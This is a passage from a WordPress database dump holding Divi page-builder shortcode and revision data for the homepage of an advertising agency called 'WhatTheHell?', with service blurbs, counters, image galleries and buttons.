button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 21:02:17','2020-07-06 21:02:17','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(261,1,'2020-07-06 21:02:39','2020-07-06 21:02:39','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency.An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" 